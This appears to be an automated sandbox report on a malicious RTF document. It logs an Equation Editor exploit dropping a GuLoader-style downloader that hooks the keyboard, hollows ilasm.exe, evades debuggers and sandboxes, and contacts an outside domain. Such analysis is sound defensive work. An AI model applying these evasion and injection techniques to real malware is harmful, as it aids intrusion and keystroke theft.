Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.certifikat.dk/repository0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.firmaprofesional.com0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: vbc.exe, 00000004.00000003.2106932336.0000000000855000.00000004.00000001.sdmp	String found in binary or memory: https://aap-ef.com/-
Source: vbc.exe, 00000004.00000003.2106932336.0000000000855000.00000004.00000001.sdmp	String found in binary or memory: https://aap-ef.com/W
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: https://www.netlock.net/docs

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\Public\vbc.exe

Windows user hook set: 0 keyboard low level C:\Users\Public\vbc.exe

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Apocalypst[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 3_2_00270456 EnumWindows,NtSetInformationThread,	3_2_00270456
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0027633E NtProtectVirtualMemory,	3_2_0027633E
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002725FB NtWriteVirtualMemory,	3_2_002725FB
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002767DE NtResumeThread,	3_2_002767DE
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00276839 NtResumeThread,	3_2_00276839
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00276A01 NtResumeThread,	3_2_00276A01
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0027201E NtWriteVirtualMemory,	3_2_0027201E
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00272242 NtWriteVirtualMemory,	3_2_00272242
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00271842 NtWriteVirtualMemory,	3_2_00271842
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0027284C NtWriteVirtualMemory,	3_2_0027284C
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00272651 NtWriteVirtualMemory,	3_2_00272651
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00272A5C NtWriteVirtualMemory,	3_2_00272A5C
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00276898 NtResumeThread,	3_2_00276898
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00276A98 NtResumeThread,	3_2_00276A98
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002726E8 NtWriteVirtualMemory,	3_2_002726E8
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002768E8 NtResumeThread,	3_2_002768E8
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002704F3 NtSetInformationThread,	3_2_002704F3
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002728DC NtWriteVirtualMemory,	3_2_002728DC
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00270520 NtSetInformationThread,	3_2_00270520
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00276B2A NtResumeThread,	3_2_00276B2A
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00276964 NtResumeThread,	3_2_00276964
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002727A4 NtWriteVirtualMemory,	3_2_002727A4
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002769B0 NtResumeThread,	3_2_002769B0
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0027299D NtWriteVirtualMemory,	3_2_0027299D
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002767E4 NtResumeThread,	3_2_002767E4

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 3_2_004011A0	3_2_004011A0
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00408A5D	3_2_00408A5D
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0040886E	3_2_0040886E
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00408AAA	3_2_00408AAA

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe

Code function: String function: 00401180 appears 48 times

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winRTF@11/14@1/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$25358c-c9a2-4b41-9da6-2ff1c62969d9.rtf

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE1F5.tmp

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf

ReversingLabs: Detection: 41%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2532, type: MEMORY

Yara detected VB6 Downloader Generic

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2532, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 3_2_00405A50 push ebp; retf	3_2_00405B25
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00405857 push es; ret	3_2_004058AB
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00405A7E push ebp; retf	3_2_00405B25
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00270054 pushad ; ret	3_2_00270068
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002743E8 push es; ret	3_2_002743CB
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002743C8 push es; ret	3_2_002743CB

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Apocalypst[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\Public\vbc.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000003.00000002.2103520045.0000000000270000.00000040.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
Source: vbc.exe, 00000003.00000002.2103520045.0000000000270000.00000040.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 3_2_00270456 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1976	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2788	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2824	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: vbc.exe, 00000003.00000002.2103520045.0000000000270000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
Source: vbc.exe, 00000003.00000002.2103520045.0000000000270000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger

Source: C:\Users\Public\vbc.exe

Code function: 3_2_00270456 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000

Hides threads from debuggers

Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 3_2_00270456 rdtsc

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 3_2_002733C6 LdrInitializeThunk,

3_2_002733C6

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 3_2_00275E3C mov eax, dword ptr fs:[00000030h]	3_2_00275E3C
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0027201E mov eax, dword ptr fs:[00000030h]	3_2_0027201E
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00271842 mov eax, dword ptr fs:[00000030h]	3_2_00271842
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00272050 mov eax, dword ptr fs:[00000030h]	3_2_00272050
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00275E50 mov eax, dword ptr fs:[00000030h]	3_2_00275E50
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0027505E mov eax, dword ptr fs:[00000030h]	3_2_0027505E
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00275571 mov eax, dword ptr fs:[00000030h]	3_2_00275571
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00272DAF mov eax, dword ptr fs:[00000030h]	3_2_00272DAF
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00271DAE mov eax, dword ptr fs:[00000030h]	3_2_00271DAE
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00271DAC mov eax, dword ptr fs:[00000030h]	3_2_00271DAC

HIPS / PFW / Operating System Protection Evasion:

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base address: 400000			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base address: 400000			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Jump to behavior

Source: recommended.4NN.4.dr	Binary or memory string: [9:53:53 AM]<<Program Manager>>
Source: recommended.4NN.4.dr	Binary or memory string: [9:54:03 AM]<<Program Manager>>

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files.zip VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files.zip VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files.zip VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf VolumeInformation	Jump to behavior
